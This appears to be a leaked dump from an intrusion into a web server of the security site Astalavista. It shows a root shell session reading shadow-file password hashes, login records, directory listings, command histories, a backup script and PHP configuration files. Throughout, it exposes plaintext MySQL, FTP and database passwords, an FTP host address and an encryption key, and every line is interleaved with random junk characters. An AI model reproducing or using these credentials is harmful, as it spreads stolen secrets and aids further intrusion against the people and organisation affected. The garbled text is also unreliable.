com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::# ~3 R: @$ g! u
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::% J3 H' B3 u1 A3 P: \
' _5 }! W* N- v% S# }- T _sh-3.2# cat /etc/motd
* ^ c2 s1 N4 v! c+ \( b#####################################################+ i/ j7 ]/ r% m6 [9 k
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
" A, Y3 l: A" H/ k, g# |__| [__ | |__| | |__| | | | [__ | |__| #- P* a9 M* I( |4 ^1 p
# | | ___] | | | |___ | | \/ | ___] | | | #
+ e3 ~3 s8 R6 f) G1 ~3 S |+ Y5 ^4 r+ j# #: ?; H" c8 r" \" s
#####################################################1 ^) [6 U# [! V; f
# #+ C8 U) U8 ~# f: H4 l0 b Y% r
# Admin Contact - 链接标记support@secureservertech.com #
0 c. y T$ K8 K: v# #- c5 ^& z: g7 X- I
# Available ShortCuts #
0 @' ?3 A7 H3 |% I( K# #: X+ l; L! E. p
# nst - list active connections #
) w6 A* `5 Y7 m0 j; ]# ddos - shows how many times each ip is connected #+ O, `9 r8 h+ K: V) `
# ltr - restart the webserver # a0 d& F# p' s4 k' i' b: d+ G/ U
# phpc - edit the php config file #
: T) z' `3 ]9 W8 \ _# htc - edit the webserver configuration file #
2 f# Y+ O* z6 s6 j' o# up - uptime #+ J- I- G! o0 _4 n1 _+ [
# etd - edit the motd of the day file #" a8 w3 D7 ~( O/ d1 \ _
# htr - start and restart apache if needed #
" G; J, D* p& w, j: N, y# syng - shows active SYN_RECV connections #
" C# u& D% v3 y; h# synd - syn flood blocker - “synd -h” for usage #
7 |4 }. x L3 Q. {7 q5 V#####################################################
% X$ x; g5 l" u% B# NOTES: #" f# r4 ?9 I$ }' O8 o8 ~8 p# o7 [
# Last Upgrade - 12-08-2008 by JF #$ w- [* I: m9 Z
# My.cnf/Mysql Optimization - 1-28-09 #
/ g% B/ t6 e$ N. w. L+ b) U3 l# #6 I; u [% S. y4 ?2 \
# #
7 K+ Y( ]: X! F$ t# #' N0 V7 Z/ ~8 M$ _( q! o7 Y
#####################################################; h) n; Y2 s4 u* P( I
9 L) |% j* o/ x4 q7 {
sh-3.2# lastlog | grep -v Never
' P# ~. l" t/ q7 B! X6 m( G) I& MUsername Port From Latest
) i- v4 D3 m# F9 g' b/ U- @root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
l% c' T7 f5 kadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
6 Z) R! N! }: i! \7 C7 ]2 f5 @5 {com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20098 {7 R( e% h4 [( F, [$ r
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
# o/ ?1 O4 J9 `# }- D5 |1 w$ ]7 F& b6 {( [2 g- S( R4 X
sh-3.2# ls -la
1 Z$ t6 p8 m( e7 J2 H8 R8 A. ctotal 4533761 x" o; d' N, q6 r# s$ P7 t" K
drwxr-x— 15 root root 4096 Jun 4 08:40 .5 C4 ?) j, @4 ~
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 g. L: D5 ]1 x1 x& @) M8 t9 ~-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip9 t; J, ]1 C8 k. l" | J* T" Q7 E
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg) I9 u: i6 U% E A# U
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history7 Q! U$ m" D1 c, M/ s" t
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
# v7 @/ {( r) A. }( H-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
2 v. u* _1 w6 z# Z4 i$ R-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc% X& G4 @, O5 W4 w" H1 p
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
* v4 q B# y0 n+ S-rw-r–r– 1 root root 1327 Nov 29 2007 cert
: T4 k1 y' V8 B- ^! s2 }-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql% B+ ?, j! G7 Y; y4 u
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
8 S9 d' ^; m, g( D _+ b$ a-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc1 q5 F* Y4 n6 c% g/ s, N5 k
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
. j/ |( ]( r9 x$ jdrwx—— 2 root root 4096 Oct 28 2007 .elinks! n0 }5 H2 h& Y8 `/ J' ]" E
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
, e7 ]0 A$ }% O3 F; I-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
' @$ {- \; _+ }# p5 x5 V+ ?" Y" \-rw——- 1 root root 0 Apr 16 13:19 .history' I! S, k2 H9 p1 f, P+ s
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log( s1 i2 Y, U* e# I' Q& E: m. H
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
4 B3 R& v! s4 R5 a3 {7 V- x; Z: [-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
" ^. J' Z4 j" r6 b$ X-rw——- 1 root root 35 Jun 2 14:23 .lesshst
( W" e5 d4 T2 a; H4 c/ udrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp" c/ I; I0 b' Y8 u
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
% q/ P9 B- G7 B U-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz2 X6 V0 N' }9 Z1 [4 N: e
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
' m O7 b$ P2 X1 k-rwx—— 1 root root 760 Sep 18 2008 lp- a/ G1 f: H6 G! F
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
) Y2 v% L. ?# g [* a5 r6 r9 u( S-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
0 P! `0 i2 L4 b0 b7 J-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
5 j' b) f) z2 b5 W- C, Rdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
0 n0 D/ y+ P- o0 @6 T- a9 y2 W. j-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz' [2 [6 s) J+ s& |3 \9 n9 K8 y
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
- k- L3 T \4 \; s9 E$ ]-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
8 F7 R! b/ e8 @3 ]* C6 z8 h-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh2 Y$ G8 j; T' Z# t7 E3 O5 V9 X
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
- X" P3 a; I8 {' j: p% {-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
- v8 C5 [ {/ U# ~+ v4 ]; h-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport8 `0 m' B8 A; d
-rw——- 1 root root 41 May 20 2008 .mytop
8 ?8 {# J9 [5 M2 D; ldrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6! k& c: W: |" d6 k
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
: b2 k: h, `! I/ @/ |8 s3 Odrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
$ L$ i8 m: q+ d-rw——- 1 root root 1462 Sep 21 2007 opt.php2 q2 S* I4 ?8 h; K6 L, } J
-rw-r–r– 1 root root 3371 Sep 22 2007 p7 w9 C: {; l0 W' c$ B1 @
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz20 H4 M/ I& ]& X. N; q2 }
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
% @4 L+ i' D" e1 G-rw-r–r– 1 root root 716 Nov 28 2007 server.csr! A& r* J3 m* w* s: Q
-rw-r–r– 1 root root 887 Nov 28 2007 server.key/ i/ K6 a$ j/ f7 P
drwx—— 2 root root 4096 Oct 10 2008 .ssh
# {7 a' e" L: n/ O6 l5 i, D-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
5 {# s3 Z6 T& w/ n; ]-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
! X: z& D$ \8 f$ k0 O: j# n-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip8 l* x0 k8 ^9 F' ~8 s0 Q/ {
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1! Z& c3 T3 d, A
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
# e- b7 A) e" T. r9 D-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
$ _8 ?2 d: \: ^! _9 e6 Ydrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.09 O0 d* T3 T+ M2 l; I. G
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2- a- s5 K+ \! ]" B5 _' [
-rw——- 1 root root 12997 May 16 2008 .viminfo$ ]' q% B& g$ C" s' t# z
4 {+ w: C2 i S7 S& {
sh-3.2# cat .bash_history, Z9 z; C0 V3 s- q M
[snip]3 ]- _- x- r' {
wget cp4sst.com/sstlinux.tar.gz; K7 \" Q1 a# x$ |" G
tar zxvf sstlinux.tar.gz5 i8 x1 G% j& L! }0 R
cd linux-2.6.27.10
. g# Z2 F1 {8 tsh install.sh
( L+ Q$ H, v6 m; R0 {$ f" a" ymake bzImage ; make modules ; make modules_install ; make install8 F3 M. z' A& i
make clean
' v) v/ j) c1 n7 Eservice mysqld restart
2 k* B$ b" a: c* K. x. Y& M& H7 B[snip]. h; Y n1 q9 b
cd /usr/sbin/
" c8 W2 K, N6 [, ychmod 4777 traceroute
! f% h# H& |# D2 Nchmod 4777 ping2 c4 M5 d+ f0 z! M1 B7 [& }) d! W
traceroute -I 链接标记[url]www.astalavista.ch[/url]
: [% M+ V5 o* \3 V( K2 l[snip]+ j% x: j/ H4 b$ T. D; a7 ]
vi /etc/csf/csf.conf
g6 C. p" v! M: Dtraceroute google.ch
6 h1 W( @, E' b' \- l, ?service csf restart- @# K V1 N9 M* p+ q& M' B# o
tracert google.ch
, O2 {# R+ {: u! Zservice csf restart
& i( {& D! e9 d3 D& Ntraceroute 链接标记[url]www.google.ch[/url]
- H& a2 W% i6 C* z5 P6 atracert 链接标记[url]www.google.ch[/url]
' s9 P1 n; k' B+ F& M5 O" Etraceroute 链接标记[url]www.google.ch[/url]' b# G8 B4 V- u$ J
locate traceroute
( `* {/ P2 n! {/ mchown 4755 /bin/traceroute7 k, ], _- I$ I9 i: `
chown 4777 /bin/traceroute
/ s! h- Q' y6 V$ ^+ c Xlocate ping$ q8 ?1 x# k, b: \2 c g! L
chown 4755 /bin/ping
9 e& M; i4 Y+ {chown 4777 /bin/ping
6 ~/ h5 Y- ]" U; F3 _, acd /bin/
7 Z7 }+ ^1 ?& j. E, P$ F6 E/ tls -ali | grep ping v5 E- ~2 i& h3 j# _5 S
chown root ping% f! e/ o5 c' D( ^& q0 j/ e
chmod 4755 ping
8 U- V1 ?( ?4 bls -ali | grep traceroute
: m ]. A U. O0 dchown root traceroute f: g# T5 j; f8 z+ c# v" |
chmod 4755 traceroute: c/ ]$ m2 q. } N/ f
ls -ali | grep traceroute+ l/ y. {% O! k3 j6 T
traceroute -I 链接标记[url]www.google.ch[/url]
0 y0 G" p3 Q9 S) F |6 \traceroute 链接标记[url]www.google.ch[/url]8 G; L& @ l/ n2 u
whois pmsantos.ch- H1 r9 f) A0 f9 e; h ?" v l
[snip]6 j8 F3 E6 e& f( R& o. v+ F! s
mysql -h com_contrexx2_live < /root/defaultp_ports.sql; k1 p5 J+ t4 j" j6 k* u
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
/ |% b# ?/ |( ?" t* U: T, j6 pmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
3 U% S4 Y" `" j3 k. [# t! _mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql: |; X5 `- Z$ T
top
4 y4 c. ~" n! h1 E" y9 J: p( |: Xping ssth.ch9 F1 L! g: Z2 y5 u
ping asdlkfaljgasd???ljg???lasj.ch" z2 a2 |, \# w8 ?3 m
ping asdlkfaljgasdlasj.ch
% y5 r: P" T# }: d0 Rping 链接标记[url]www.ssth.ch[/url]% @* R/ M t. _! U0 A% z& J/ i6 W
ping ssth.ch# ~7 Q( j( F# t
nslookup 链接标记[url]www.google.ch[/url] H. Z6 ]3 z- t
nslookup 链接标记[url]www.ssth.ch[/url]
+ y. J# \( \- {7 p& y: ?man nslookup; J3 z% M4 M3 i# B: O* {
ping 链接标记[url]www.google.ch[/url]) s% c1 `- q2 Q' P2 E u' H' @# _
nslookup 链接标记[url]www.google.ch[/url]) _) L& R. }1 f0 e/ D6 r
nslookup 链接标记[url]www.google.ch[/url] i6 k0 x+ R2 y) x: u
nslookup salfjasdlf.ch
) L5 r7 q+ j" G9 M[snip]/ `* T/ A6 a3 ^: r; d
openssl passwd -1 sadf0 E6 M& o U& L
openssl passwd -1 5cZNHstdTy
: i) Y/ `9 i2 f! ` I- ]% ^4 }1 Z2 _/ Ymysql9 h$ N' J# L) ~( ?9 S" X
mysql
2 e S% u3 D5 ulocate proftp2 s( m3 P* z% b _/ f' [3 k
vi /etc/proftpd.passwd
: v. V. C+ @3 h: B/ dservice proftpd restart! w7 H8 H4 I3 o: ^
locate proftpd.conf, Y- I* x- _ r/ R* ~- L% q0 p
vi /etc/proftpd.conf
8 i: H, x U; \ avi /etc/proftpd.passwd
1 z8 g* E' h. Rservice proftpd restart. w' n. e3 o% ^
[snip]% q2 Z) s' h( _
/bin/sh /home/com/backup_system/backup.sh8 e3 m0 Q2 V( s6 }9 w
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
5 y& F3 Y6 S4 a! w3 a3 Z: t$ amysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql& N8 ~2 \) o% @8 c8 T
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
" p4 R6 A1 b: K" `, L$ `3 {ls -ali
4 c* n( U) X- S' jmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
& t! V: s* U3 g% O, @, W S+ m& Nmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
2 l6 S, d' u, D0 ucrontab -l
0 N/ q2 Z9 H2 [9 X! M6 Mcrontab -l: h7 e# ]+ g1 F/ A9 f6 n
php -q /home/com/public_html/modifications/cronjobs/securitynews.php8 F, V* A0 x) `* d
/home/com/public_html/modifications/cronjobs/exploits.sh* d$ Z% L3 f& h& V, v/ I
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]) m- o3 W. I/ h& Z( G4 Z
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz3 w: o$ u7 D# z6 |
cd lsws-4.0.3- a5 f1 c+ g5 Z% t i# [) O' o' |
sh install.sh
* G4 e. E( W- r I9 ^uptime. q5 X7 Z% W4 ~3 _
hdparm -tt /dev/sda/ Q5 ~5 Y8 s8 e( o
iostat
/ D* r& p, ?6 }% ]0 ?( {+ B, Ryum install iostat
. |6 ?6 `- S& @, B# Liostat
5 A6 x3 E7 k( N- vwhereis iostat
( E! K0 Y3 m/ u8 E7 [) A, ]yjm clean all
- C" V' Y& V1 \ n/ X6 Cyum clean all ; yum -y update
3 {+ q& b# ^( j+ T# q g4 tiostat/ F! L1 R! X/ m
yum install systat( y7 d' r* k& t) r
rpm -qa | grep iostat' `6 x. Q. j2 t% p) n3 O* m9 w+ p6 W
rpm -qa | grep sysstat
( P5 o9 l- I# j5 l4 H+ L4 ?rpm -qa | grep systat# }; F5 X% w4 s) h% R) m
dmesg -c, D# Y; Z8 t6 v" s7 U7 U* g
sysctl -p
" j! }4 i* G$ h$ ?5 ?uname -r
) N: g6 [( r: e1 ?cd /usr/src! J7 T% V9 K7 K* E; w: q
wget nix101.com/kernels/sstlinux.tar.gz
9 a+ l& o; ]) D) T7 o, S( Hshutdown -r now
" n8 _) J9 e( D6 [6 ^: c- Q. Onano -w /boot/grub/grub.conf' V. |: q: L7 P6 t8 _
X$ G% X1 A2 P1 \- V) d( d5 j8 r) Vsh-3.2# cat .my.cnf- `: y$ V5 {! k
[client]$ j" r) A9 N, A2 A$ H
user=da_admin" d* m0 w& _: m Q
password=X9dctmRH0 G, s# E+ [: i: i. q! x+ o* V [! k
1 ^& P4 g# a/ \: i# n" osh-3.2# cat /home/com/backup_system/backup.sh
7 z( Z8 M3 E8 {" k& u+ c#!/bin/sh+ S& g4 Y0 i% j) z& @2 {
##################################################################### I+ L+ R; v5 n
# #
) b1 n/ v, l5 T- G% j; s# incremental backup for astalavista.com #
9 ^2 N4 C) X5 h% K0 ^0 e7 j# #
+ ^7 t$ |& j# @4 e# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
3 M3 T6 j; u! s# #
5 n' ~' C( @$ D3 {5 H+ i2 q#####################################################################! A. U ^4 `, g1 V t
[snip]% b5 v3 S$ J. P/ I) F
PROG_DIR=”/home/com/backup_system”; H$ }: z6 W- j& j- [+ ~% q# u' I2 E
BACKUP_DIR=”/home/com/backups”;
% W, t9 T' H, z% l# ADOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;5 P8 u* g. \' w6 q
# ftp for synology backup server
2 j( E# i$ U- C% @FTP_HOST=”212.254.194.163″;. A9 g1 o4 x+ I2 [& E1 @
FTP_PORT=”21″;5 a+ B& J5 c. t. F
FTP_USER=”astalavista.com”;
5 G; |( k/ P; P5 ^FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;; ?+ N. g! f' X9 g# K
FTP_DIR=”/astalavista.com”;
" g7 n+ m) s. q# database
3 B1 k A! ?# _8 f3 i( PDB_HOST=”localhost”;) _; S& u8 |: u% X
DB_USER=”contrexxuser2″;
2 T; w* n: N& |; r7 e1 [' PDB_PASS=”0fEYNZgXz1pKe”;
9 L4 Y( W+ o$ R+ r+ f) K! v/ nDB_DATABASE1=”com_contrexx2_live”;8 M, X* X/ r* u" `- t
DB_DATABASE2=”com_contrexx2″;
- O: l4 B- _! Z[snip]( f# f3 D' ^) e G, {
ftp -in $FTP_HOST $FTP_PORT <<EOF; ?, Z6 e# {. w7 J1 X9 a/ m
quote USER $FTP_USER; e8 n* ]% R0 P
quote PASS $FTP_PASS
7 e0 }% R: d' M8 w+ t. ]* lcd $FTP_DIR
1 J. ]7 i1 G7 T0 T5 v4 q; C' u! {put $DB_FULLNAME-SQL_Dump.tar
9 q9 L3 P: ^9 @$ w5 X+ }8 p$ Gput $BACKUP_FULLNAME-Public_HTML.tar
3 x4 y$ V) Q+ @) p6 g' Z$ x+ Jclose
X; x2 g1 g" f2 i sbye
! ^2 Y/ Q' e) |4 vEOF
! Q& x: x' t! R% T- m
* w0 ~4 D! h1 C' E( ]7 h8 Tsh-3.2# cd /home
w3 Q2 ^# d4 m& v7 Ash-3.2# ls -la; V* P* e4 \; \7 Y; d
total 120" p, w1 G; K: \) y2 n; B
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
8 L6 s0 R. c5 G2 w5 Wdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 f+ B, V3 @) N# N" m) w ldrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
3 ]7 }1 c' g2 x' o! K3 ]" c-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
1 A' ], [* G% S1 N5 C- d f* W8 A-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
+ L+ N& A6 \) Udrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
2 O6 ~0 J" P9 _drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
) Y- z; l I( T( d# o2 y8 _9 Jdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
; ^/ y' Z i- m7 \1 ydrwx–x–x 10 com com 4096 Apr 28 12:40 com
5 `) z/ P' z+ E7 o& J1 }drwxr-xr-x 2 root root 4096 May 17 2007 ftp/ N0 L/ Y7 L3 S, A+ V8 T8 P4 f
drwx—— 3 jon jon 4096 Sep 21 2007 jon5 N+ l2 p, g% t* B: B
drwx—— 2 root root 16384 Sep 11 2007 lost+found
* I- z& m0 m6 L n$ a9 ~# ]drwxr-xr-x 2 root root 4096 Sep 14 2007 my8 E# J; [3 _* C: c s1 l+ e4 s- k
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
. w9 i# s. |1 X9 z* ydrwx—— 2 jon jon 4096 Sep 15 2007 test
# B, w9 d* ]/ u' n& kdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
) s% T6 c) o" w7 L3 B7 G: O7 K" Y. t
sh-3.2# cd admin9 g- i' R6 n0 V; a( B7 t
sh-3.2# ls -la0 o, C* U, q0 h& M
total 1735896
4 V3 j" B! r0 [/ G6 J7 Mdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
4 \4 ]% ?8 Q7 Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..; l4 i, q& |" ]: {% M$ P
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups6 d- J |7 |( x6 x
drwx—— 2 admin admin 4096 Sep 28 2007 backups2 P) A7 i# O# p" [: u6 t) H
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
4 n1 C; H, a0 ~7 K1 F+ _* D-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout8 ^- R! ^( Y7 z0 y0 Z
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
; m- q1 z, i }3 a: e$ l) a-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc! i, `) n) m% V6 i. y
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups B# g9 V4 z( E V6 {# q. K" i' j
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
/ u' V. Z, b6 d6 g# Cdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap1 A z# ]9 v# V0 _
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
$ z9 D! N* ]: W6 H$ Ldrwx—— 2 admin admin 4096 Sep 21 2007 mail$ B( g. G1 z# E$ k( A
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr' g6 y, ~0 T, c) E7 o0 j
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
. `* d+ x n& I5 Y-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
1 w1 e( U/ b2 Z: |- p' c: Q-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz) s' m: g( j2 ~( W" |9 T& Y! a
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
2 w: \3 w) O6 Y; q) T; T. i. B( }7 b) B' A k$ P2 w
sh-3.2# ..; A5 P& Z5 V( Q1 ^; `9 C3 O) b
sh-3.2# cd jon. M# V9 X0 Y, x! i4 R1 J
sh-3.2# ls -la6 U7 N4 Q* L/ F/ L- P4 C
total 36' x) s1 g% r; Z# |/ a. L
drwx—— 3 jon jon 4096 Sep 21 2007 .
" v2 u8 a+ y% m/ L$ w! U7 rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ y6 k2 \3 y# F1 _
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
}3 D- D" G3 e* h-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
' H* D, p/ k* Q& E-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile" l& \, f" f% j3 X+ d' \; ~6 E
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc9 u4 c2 r) m1 o9 o7 u
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
- r' \3 I" s" Z+ Z2 Adrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
- C4 m4 w; `8 t* @2 w# X9 n
* \; P" w2 v2 x9 O9 M! Y, [5 {" Zsh-3.2# cd ..$ q; o1 s; v+ j X* c3 }7 Y
sh-3.2# cd test0 ]' U5 o, A5 o" v6 @8 ~5 [; w
sh-3.2# ls -la
2 N' A) \4 `- t7 Qtotal 48
8 j' o3 q* R$ a/ @; c9 X1 o! a' o6 Idrwx—— 2 jon jon 4096 Sep 15 2007 .
, N8 }4 S1 |- _& X6 Kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, s) b" `% f `% u0 c-rw——- 1 jon jon 79 Sep 21 2007 .bash_history1 Q. w3 x2 P0 z; p, G
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout6 J1 E3 e- W7 S* @( [- m; h8 m
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile% S7 y* a$ u0 q N+ Q: F
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
% G& G6 \' U' M, P! xsh-3.2# cat .bash_history5 p3 v# ?3 @9 W$ m
/usr/bin/mysqladmin -u root password PoliuJhytg67
, `3 Z; X, q" t/ X3 i* z
* f' N+ C" W @5 J9 \1 P& Xsh-3.2# cd ..
0 @& ], d, J! psh-3.2# cd astanet
& F3 B6 i- `3 r& ]% d( osh-3.2# ls -la% n8 b5 `$ k( ^' ?0 K/ W
total 52
+ B& A/ r6 s0 L+ k' ]* d$ U4 odrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
$ x: f7 W- `; S4 Z$ |0 sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 z9 V3 ~! O3 K8 m9 fdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
, `1 ` p7 t5 ~! j u; _-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history% ^2 o( X. t [7 S" W: J2 y
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout5 e$ H+ O0 K- ^: q J V( v) J
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile6 V& R; `: [9 [# K( V, c
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc' s9 G$ M9 i# n2 u( u% [
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains2 G* K _0 {9 L8 t6 Z
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
% }6 E# n8 G# T% H' Hdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail0 P' Z& J/ `4 O G4 U! P
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history& H( v" r/ k1 \8 W
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html$ l6 @: K' s* C& X
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow- F# L7 f8 O4 b' v+ ^' n1 ^8 P k
! B( F6 \! H, I2 ?
sh-3.2# cd auth/
6 ?. V8 I3 t! [sh-3.2# ls -la
) a$ J8 M) a& F. a* f8 jtotal 28
) F Z O" M$ ^, \6 j* cdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .1 x$ g# R9 @5 @0 p( r9 x
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..0 y+ y" ^' K& D; _
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php) `4 R+ i7 o4 Y" }8 g0 q6 o# T
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php2 n8 E5 B8 Z; t/ `' S
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd0 r# h$ w% I1 p4 k/ d
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
7 A$ }9 L# u. u3 m) c-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
1 Y: p# {) |2 L- @ [. C7 u1 K9 `% ]- V
sh-3.2# cat hackercontest.config.inc.php
8 n9 Q4 e5 N" L- n; W<?PHP
- f% T( z+ P! T( t4 l8 ?9 D" x/ l// Variabeln f?r Verbindung zur Datenbank //2 U$ t( H, z# J: N' n
$conxHost = ‘localhost’; // MySQL hostname8 r. I) k7 ^, g z; K/ H
$conxUser = ‘hackercontest’; // MySQL user
" h( m: U8 p4 I; `4 C, M* N$conxPassword = ‘K6m@7dUc’; // MySQL password
6 U1 _; M1 T3 J! Z$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
6 L+ w: N4 x- k; E9 J, |# ??>5 Y% q8 o, E1 f" q/ v1 e# F
sh-3.2# cat hosting.config.inc.php4 ?: N7 s% r6 s) h! Z' N3 T4 K
<?PHP
6 S# c1 u w5 J" }7 N' C6 H- P; e// Variabeln f?r Verbindung zur Datenbank //
" H3 W8 R1 A; N. f2 T& J$conxHost = ‘localhost’; // MySQL hostname3 R% j4 _. T3 |3 V7 L8 @5 O6 _
$conxUser = ‘hostinguser’; // MySQL user% N* {6 `2 f/ P; {! f
$conxPassword = ‘cXvB3981′; // MySQL password: H# E# \, U2 V6 a: M8 g- k
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# f3 p7 a9 J6 b; U5 D& [
?>
' K& F# t* [, e8 f: K8 |! O( z/ ]" ^ a$ \2 G2 g
sh-3.2# cd ... e- [* q" m$ U
